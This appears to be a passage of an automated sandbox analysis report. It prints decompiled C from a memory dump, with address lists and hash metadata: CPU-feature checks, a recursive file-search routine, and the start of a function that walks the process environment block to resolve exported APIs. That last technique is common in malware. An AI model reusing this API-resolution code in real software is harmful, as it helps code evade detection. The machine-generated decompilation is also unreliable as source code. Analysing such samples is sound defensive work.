                                                                                                                                                                                                                                				asm("cpuid");
                                                                                                                                                                                                                                				_t77 =  &_v40;
                                                                                                                                                                                                                                				 *_t77 = 1;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t77 + 4)) = _t75;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t77 + 8)) = 0;
                                                                                                                                                                                                                                				 *(_t77 + 0xc) = _t90;
                                                                                                                                                                                                                                				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
                                                                                                                                                                                                                                					L9:
                                                                                                                                                                                                                                					_t96 =  *0x736ef490; // 0x2
                                                                                                                                                                                                                                					L10:
                                                                                                                                                                                                                                					_t85 = _v32;
                                                                                                                                                                                                                                					_t60 = 7;
                                                                                                                                                                                                                                					_v8 = _t85;
                                                                                                                                                                                                                                					if(_v16 < _t60) {
                                                                                                                                                                                                                                						_t78 = _v20;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_push(_t77);
                                                                                                                                                                                                                                						asm("cpuid");
                                                                                                                                                                                                                                						_t82 =  &_v40;
                                                                                                                                                                                                                                						 *_t82 = _t60;
                                                                                                                                                                                                                                						 *((intOrPtr*)(_t82 + 4)) = _t77;
                                                                                                                                                                                                                                						 *((intOrPtr*)(_t82 + 8)) = 0;
                                                                                                                                                                                                                                						_t85 = _v8;
                                                                                                                                                                                                                                						 *(_t82 + 0xc) = _t90;
                                                                                                                                                                                                                                						_t78 = _v36;
                                                                                                                                                                                                                                						if((_t78 & 0x00000200) != 0) {
                                                                                                                                                                                                                                							 *0x736ef490 = _t96 | 0x00000002;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t61 =  *0x736eb010; // 0x6f
                                                                                                                                                                                                                                					_t62 = _t61 | 0x00000002;
                                                                                                                                                                                                                                					 *0x736ef48c = 1;
                                                                                                                                                                                                                                					 *0x736eb010 = _t62;
                                                                                                                                                                                                                                					if((_t85 & 0x00100000) != 0) {
                                                                                                                                                                                                                                						_t63 = _t62 | 0x00000004;
                                                                                                                                                                                                                                						 *0x736ef48c = 2;
                                                                                                                                                                                                                                						 *0x736eb010 = _t63;
                                                                                                                                                                                                                                						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
                                                                                                                                                                                                                                							asm("xgetbv");
                                                                                                                                                                                                                                							_v24 = _t63;
                                                                                                                                                                                                                                							_v20 = _t90;
                                                                                                                                                                                                                                							_t104 = 6;
                                                                                                                                                                                                                                							if((_v24 & _t104) == _t104) {
                                                                                                                                                                                                                                								_t66 =  *0x736eb010; // 0x6f
                                                                                                                                                                                                                                								_t67 = _t66 | 0x00000008;
                                                                                                                                                                                                                                								 *0x736ef48c = 3;
                                                                                                                                                                                                                                								 *0x736eb010 = _t67;
                                                                                                                                                                                                                                								if((_t78 & 0x00000020) != 0) {
                                                                                                                                                                                                                                									 *0x736ef48c = 5;
                                                                                                                                                                                                                                									 *0x736eb010 = _t67 | 0x00000020;
                                                                                                                                                                                                                                									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
                                                                                                                                                                                                                                										 *0x736eb010 =  *0x736eb010 | 0x00000040;
                                                                                                                                                                                                                                										 *0x736ef48c = _t104;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L23;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t73 = _v40 & 0x0fff3ff0;
                                                                                                                                                                                                                                				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
                                                                                                                                                                                                                                					_t99 =  *0x736ef490; // 0x2
                                                                                                                                                                                                                                					_t96 = _t99 | 0x00000001;
                                                                                                                                                                                                                                					 *0x736ef490 = _t96;
                                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                0x736d79cf
                                                                                                                                                                                                                                0x736d79d2
                                                                                                                                                                                                                                0x736d79db
                                                                                                                                                                                                                                0x736d79e0
                                                                                                                                                                                                                                0x736d79e0
                                                                                                                                                                                                                                0x736d79db
                                                                                                                                                                                                                                0x736d79eb
                                                                                                                                                                                                                                0x736d79f0
                                                                                                                                                                                                                                0x736d79f3
                                                                                                                                                                                                                                0x736d79fd
                                                                                                                                                                                                                                0x736d7a08
                                                                                                                                                                                                                                0x736d7a0e
                                                                                                                                                                                                                                0x736d7a11
                                                                                                                                                                                                                                0x736d7a1b
                                                                                                                                                                                                                                0x736d7a26
                                                                                                                                                                                                                                0x736d7a32
                                                                                                                                                                                                                                0x736d7a35
                                                                                                                                                                                                                                0x736d7a38
                                                                                                                                                                                                                                0x736d7a43
                                                                                                                                                                                                                                0x736d7a48
                                                                                                                                                                                                                                0x736d7a4a
                                                                                                                                                                                                                                0x736d7a4f
                                                                                                                                                                                                                                0x736d7a52
                                                                                                                                                                                                                                0x736d7a5c
                                                                                                                                                                                                                                0x736d7a64
                                                                                                                                                                                                                                0x736d7a69
                                                                                                                                                                                                                                0x736d7a73
                                                                                                                                                                                                                                0x736d7a81
                                                                                                                                                                                                                                0x736d7a94
                                                                                                                                                                                                                                0x736d7a9b
                                                                                                                                                                                                                                0x736d7a9b
                                                                                                                                                                                                                                0x736d7a81
                                                                                                                                                                                                                                0x736d7a64
                                                                                                                                                                                                                                0x736d7a48
                                                                                                                                                                                                                                0x736d7a26
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d7aa3
                                                                                                                                                                                                                                0x736d7965
                                                                                                                                                                                                                                0x736d796f
                                                                                                                                                                                                                                0x736d7994
                                                                                                                                                                                                                                0x736d799a
                                                                                                                                                                                                                                0x736d799d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 736D78ED
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                                                                                • Opcode ID: b49cf25cf1d6181b43e35d439e91cd8c151c881458da6c7a0b15498ab89c86f0
                                                                                                                                                                                                                                • Instruction ID: 3bfbb076308cc8d32f23990a486e9b4c1090027ee91166f7ef8ac2a5e8bb4a98
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b49cf25cf1d6181b43e35d439e91cd8c151c881458da6c7a0b15498ab89c86f0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E851D0B3A55209CFEB05CF56C585BAEB7F4FB48304F28856AD41AEB284D3749A08CF51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                			E736DA676(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v28;
                                                                                                                                                                                                                                				intOrPtr* _v32;
                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                				signed int _v48;
                                                                                                                                                                                                                                				struct _WIN32_FIND_DATAW _v604;
                                                                                                                                                                                                                                				char _v605;
                                                                                                                                                                                                                                				intOrPtr* _v612;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v616;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v620;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v624;
                                                                                                                                                                                                                                				signed int _v628;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v632;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v636;
                                                                                                                                                                                                                                				signed int _v640;
                                                                                                                                                                                                                                				signed int _v644;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v648;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v652;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v656;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v660;
                                                                                                                                                                                                                                				signed int _v664;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v668;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _v672;
                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				intOrPtr _t68;
                                                                                                                                                                                                                                				signed int _t73;
                                                                                                                                                                                                                                				signed int _t75;
                                                                                                                                                                                                                                				char _t77;
                                                                                                                                                                                                                                				signed char _t78;
                                                                                                                                                                                                                                				signed int _t84;
                                                                                                                                                                                                                                				signed int _t94;
                                                                                                                                                                                                                                				signed int _t97;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _t98;
                                                                                                                                                                                                                                				union _FINDEX_INFO_LEVELS _t100;
                                                                                                                                                                                                                                				intOrPtr* _t106;
                                                                                                                                                                                                                                				signed int _t109;
                                                                                                                                                                                                                                				intOrPtr _t116;
                                                                                                                                                                                                                                				signed int _t118;
                                                                                                                                                                                                                                				signed int _t121;
                                                                                                                                                                                                                                				signed int _t123;
                                                                                                                                                                                                                                				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t2 = _t133 + 1; // 0x1
				_t155 = _t2;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t5 = _t158 + 1; // 0x1
					_t126 = _t5 + _t135;
					_t165 = E736DA236(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E736DD1A7(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E736DAA77(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E736DA293(_t165);
								_t167 = _v8;
							}
							E736DA293(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E736DD1A7(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E736DA176();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0x736eb004; // 0xa11be602
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E736DD200(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E736DA466(_t138 - _t160 + 1, _t160,  &_v672, E736DA982(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
                                                                                                                                                                                                                                								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
                                                                                                                                                                                                                                								__eflags = _t166 - 0xffffffff;
                                                                                                                                                                                                                                								if(_t166 != 0xffffffff) {
                                                                                                                                                                                                                                									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
                                                                                                                                                                                                                                									__eflags = _t143;
                                                                                                                                                                                                                                									_t144 = _t143 >> 2;
                                                                                                                                                                                                                                									_v644 = _t143 >> 2;
                                                                                                                                                                                                                                									do {
                                                                                                                                                                                                                                										_v636 = _t127;
                                                                                                                                                                                                                                										_v632 = _t127;
                                                                                                                                                                                                                                										_v628 = _t127;
                                                                                                                                                                                                                                										_v624 = _t127;
                                                                                                                                                                                                                                										_v620 = _t127;
                                                                                                                                                                                                                                										_v616 = _t127;
                                                                                                                                                                                                                                										_t94 = E736DA397( &(_v604.cFileName),  &_v636,  &_v605, E736DA982(_t156, __eflags));
                                                                                                                                                                                                                                										_t174 = _t174 + 0x10;
                                                                                                                                                                                                                                										asm("sbb eax, eax");
                                                                                                                                                                                                                                										_t97 =  !( ~_t94) & _v628;
                                                                                                                                                                                                                                										__eflags =  *_t97 - 0x2e;
                                                                                                                                                                                                                                										if( *_t97 != 0x2e) {
                                                                                                                                                                                                                                											L34:
                                                                                                                                                                                                                                											_push(_v612);
                                                                                                                                                                                                                                											_t98 = E736DA676(_t144, _t166, _t97, _t160, _v640);
                                                                                                                                                                                                                                											_t174 = _t174 + 0x10;
                                                                                                                                                                                                                                											_v648 = _t98;
                                                                                                                                                                                                                                											__eflags = _t98;
                                                                                                                                                                                                                                											if(_t98 != 0) {
                                                                                                                                                                                                                                												__eflags = _v616 - _t127;
                                                                                                                                                                                                                                												if(_v616 != _t127) {
                                                                                                                                                                                                                                													E736DA293(_v628);
                                                                                                                                                                                                                                													_t98 = _v648;
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                												_t127 = _t98;
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												goto L35;
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                											_t144 =  *((intOrPtr*)(_t97 + 1));
                                                                                                                                                                                                                                											__eflags = _t144;
                                                                                                                                                                                                                                											if(_t144 == 0) {
                                                                                                                                                                                                                                												goto L35;
                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                												__eflags = _t144 - 0x2e;
                                                                                                                                                                                                                                												if(_t144 != 0x2e) {
                                                                                                                                                                                                                                													goto L34;
                                                                                                                                                                                                                                												} else {
                                                                                                                                                                                                                                													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
                                                                                                                                                                                                                                													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
                                                                                                                                                                                                                                														goto L35;
                                                                                                                                                                                                                                													} else {
                                                                                                                                                                                                                                														goto L34;
                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										L43:
                                                                                                                                                                                                                                										FindClose(_t166);
                                                                                                                                                                                                                                										goto L44;
                                                                                                                                                                                                                                										L35:
                                                                                                                                                                                                                                										__eflags = _v616 - _t127;
                                                                                                                                                                                                                                										if(_v616 != _t127) {
                                                                                                                                                                                                                                											E736DA293(_v628);
                                                                                                                                                                                                                                											_pop(_t144);
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                										__eflags = FindNextFileW(_t166,  &_v604);
                                                                                                                                                                                                                                									} while (__eflags != 0);
                                                                                                                                                                                                                                									_t106 = _v612;
                                                                                                                                                                                                                                									_t149 = _v644;
                                                                                                                                                                                                                                									_t156 =  *_t106;
                                                                                                                                                                                                                                									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
                                                                                                                                                                                                                                									__eflags = _t149 - _t109;
                                                                                                                                                                                                                                									if(_t149 != _t109) {
                                                                                                                                                                                                                                										E736DCCB0(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E736DA2CD);
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									goto L43;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_push(_v612);
                                                                                                                                                                                                                                									_t127 = E736DA676( &_v604, _t166, _t160, _t127, _t127);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								L44:
                                                                                                                                                                                                                                								__eflags = _v652;
                                                                                                                                                                                                                                								_pop(_t165);
                                                                                                                                                                                                                                								if(_v652 != 0) {
                                                                                                                                                                                                                                									E736DA293(_v664);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t100 = _t127;
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								__eflags = _t138 - _t160 + 1;
                                                                                                                                                                                                                                								if(_t138 == _t160 + 1) {
                                                                                                                                                                                                                                									_t77 = _v605;
                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                									_push(_t156);
                                                                                                                                                                                                                                									_t100 = E736DA676(_t138, _t165, _t160, 0, 0);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_pop(_t161);
                                                                                                                                                                                                                                							__eflags = _v12 ^ _t170;
                                                                                                                                                                                                                                							_pop(_t128);
                                                                                                                                                                                                                                							return E736D6EA3(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							goto L7;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t121 = 0xc;
                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                					return _t121;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                0x736da6cc
                                                                                                                                                                                                                                0x736da6cf
                                                                                                                                                                                                                                0x736da6d9
                                                                                                                                                                                                                                0x736da6de
                                                                                                                                                                                                                                0x736da6e1
                                                                                                                                                                                                                                0x736da6e3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da6e5
                                                                                                                                                                                                                                0x736da6e5
                                                                                                                                                                                                                                0x736da6ea
                                                                                                                                                                                                                                0x736da6f1
                                                                                                                                                                                                                                0x736da6f4
                                                                                                                                                                                                                                0x736da6f6
                                                                                                                                                                                                                                0x736da707
                                                                                                                                                                                                                                0x736da709
                                                                                                                                                                                                                                0x736da70b
                                                                                                                                                                                                                                0x736da70b
                                                                                                                                                                                                                                0x736da70b
                                                                                                                                                                                                                                0x736da6f8
                                                                                                                                                                                                                                0x736da6f9
                                                                                                                                                                                                                                0x736da6fe
                                                                                                                                                                                                                                0x736da701
                                                                                                                                                                                                                                0x736da710
                                                                                                                                                                                                                                0x736da716
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da719
                                                                                                                                                                                                                                0x736da6ba
                                                                                                                                                                                                                                0x736da6ba
                                                                                                                                                                                                                                0x736da6c0
                                                                                                                                                                                                                                0x736da6c5
                                                                                                                                                                                                                                0x736da6c8
                                                                                                                                                                                                                                0x736da6ca
                                                                                                                                                                                                                                0x736da71c
                                                                                                                                                                                                                                0x736da71e
                                                                                                                                                                                                                                0x736da71f
                                                                                                                                                                                                                                0x736da720
                                                                                                                                                                                                                                0x736da721
                                                                                                                                                                                                                                0x736da722
                                                                                                                                                                                                                                0x736da723
                                                                                                                                                                                                                                0x736da728
                                                                                                                                                                                                                                0x736da72c
                                                                                                                                                                                                                                0x736da72e
                                                                                                                                                                                                                                0x736da734
                                                                                                                                                                                                                                0x736da73b
                                                                                                                                                                                                                                0x736da73e
                                                                                                                                                                                                                                0x736da741
                                                                                                                                                                                                                                0x736da744
                                                                                                                                                                                                                                0x736da745
                                                                                                                                                                                                                                0x736da746
                                                                                                                                                                                                                                0x736da749
                                                                                                                                                                                                                                0x736da74f
                                                                                                                                                                                                                                0x736da751
                                                                                                                                                                                                                                0x736da753
                                                                                                                                                                                                                                0x736da753
                                                                                                                                                                                                                                0x736da755
                                                                                                                                                                                                                                0x736da757
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da759
                                                                                                                                                                                                                                0x736da75b
                                                                                                                                                                                                                                0x736da75d
                                                                                                                                                                                                                                0x736da75f
                                                                                                                                                                                                                                0x736da76a
                                                                                                                                                                                                                                0x736da76c
                                                                                                                                                                                                                                0x736da76e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da76e
                                                                                                                                                                                                                                0x736da75f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da75b
                                                                                                                                                                                                                                0x736da770
                                                                                                                                                                                                                                0x736da770
                                                                                                                                                                                                                                0x736da776
                                                                                                                                                                                                                                0x736da778
                                                                                                                                                                                                                                0x736da77e
                                                                                                                                                                                                                                0x736da780
                                                                                                                                                                                                                                0x736da7a2
                                                                                                                                                                                                                                0x736da7a2
                                                                                                                                                                                                                                0x736da7a4
                                                                                                                                                                                                                                0x736da7a6
                                                                                                                                                                                                                                0x736da7b2
                                                                                                                                                                                                                                0x736da7b2
                                                                                                                                                                                                                                0x736da7a8
                                                                                                                                                                                                                                0x736da7a8
                                                                                                                                                                                                                                0x736da7aa
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da7ac
                                                                                                                                                                                                                                0x736da7ac
                                                                                                                                                                                                                                0x736da7ae
                                                                                                                                                                                                                                0x736da7b0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da7b0
                                                                                                                                                                                                                                0x736da7aa
                                                                                                                                                                                                                                0x736da7ba
                                                                                                                                                                                                                                0x736da7c2
                                                                                                                                                                                                                                0x736da7c8
                                                                                                                                                                                                                                0x736da7c9
                                                                                                                                                                                                                                0x736da7cb
                                                                                                                                                                                                                                0x736da7d3
                                                                                                                                                                                                                                0x736da7d9
                                                                                                                                                                                                                                0x736da7df
                                                                                                                                                                                                                                0x736da7e5
                                                                                                                                                                                                                                0x736da7f9
                                                                                                                                                                                                                                0x736da7fe
                                                                                                                                                                                                                                0x736da809
                                                                                                                                                                                                                                0x736da81f
                                                                                                                                                                                                                                0x736da821
                                                                                                                                                                                                                                0x736da824
                                                                                                                                                                                                                                0x736da847
                                                                                                                                                                                                                                0x736da847
                                                                                                                                                                                                                                0x736da849
                                                                                                                                                                                                                                0x736da84c
                                                                                                                                                                                                                                0x736da852
                                                                                                                                                                                                                                0x736da852
                                                                                                                                                                                                                                0x736da858
                                                                                                                                                                                                                                0x736da85e
                                                                                                                                                                                                                                0x736da864

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3461e2c60e6d4c5939a134ba3cb52cde9107de1d4536251b3d6e8e61dfd9a7b8
                                                                                                                                                                                                                                • Instruction ID: 6563921d8747190b544969d9289332bf6585bf38bccdcf0ff43e51d73c7f8261
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3461e2c60e6d4c5939a134ba3cb52cde9107de1d4536251b3d6e8e61dfd9a7b8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA4190B5818218AFDF10DF79CD88BAABBB9AF45300F1442D9E41DD3390DA359E858F54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: KERNEL32.dll
                                                                                                                                                                                                                                • API String ID: 0-254546324
                                                                                                                                                                                                                                • Opcode ID: 6ee296efeeb031930c4c1beb965e79c39e89d32f26540cbd19edd0221f735a65
                                                                                                                                                                                                                                • Instruction ID: 53fb52a3222fd25ad7b9994d07e140d175679334a84f0fac8ef09c4ac9e1e837
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ee296efeeb031930c4c1beb965e79c39e89d32f26540cbd19edd0221f735a65
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08F10472C607498AD317C637C451224F664AFAF284729D76BF10B3D8E6F729B4D2EA00
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D6620(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr* _v12;
                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                				intOrPtr _v32;
                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                				intOrPtr _t49;
                                                                                                                                                                                                                                				intOrPtr _t51;
                                                                                                                                                                                                                                				intOrPtr* _t54;
                                                                                                                                                                                                                                				signed int _t56;
                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                				intOrPtr* _t70;
                                                                                                                                                                                                                                				signed char _t71;
                                                                                                                                                                                                                                				intOrPtr _t73;
                                                                                                                                                                                                                                				signed int _t77;
                                                                                                                                                                                                                                				intOrPtr _t83;
                                                                                                                                                                                                                                				signed int _t84;
                                                                                                                                                                                                                                				intOrPtr _t85;
                                                                                                                                                                                                                                				signed int _t87;
                                                                                                                                                                                                                                				signed short _t91;
                                                                                                                                                                                                                                				signed int _t92;
                                                                                                                                                                                                                                				signed short* _t93;
                                                                                                                                                                                                                                				intOrPtr* _t95;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v20 = __ecx;
                                                                                                                                                                                                                                				_v24 = __edx;
                                                                                                                                                                                                                                				_t70 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
                                                                                                                                                                                                                                				_t73 =  *((intOrPtr*)(_t70 + 0x18));
                                                                                                                                                                                                                                				_v8 = _t73;
                                                                                                                                                                                                                                				if(_t73 == 0) {
                                                                                                                                                                                                                                					L16:
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                						_t49 =  *((intOrPtr*)(_t70 + 0x2c));
                                                                                                                                                                                                                                						_t93 =  *(_t70 + 0x30);
                                                                                                                                                                                                                                						_t70 =  *_t70;
                                                                                                                                                                                                                                						_v36 = _t49;
                                                                                                                                                                                                                                						_v28 = _t70;
                                                                                                                                                                                                                                						_t51 =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x3c)) + _t73 + 0x78));
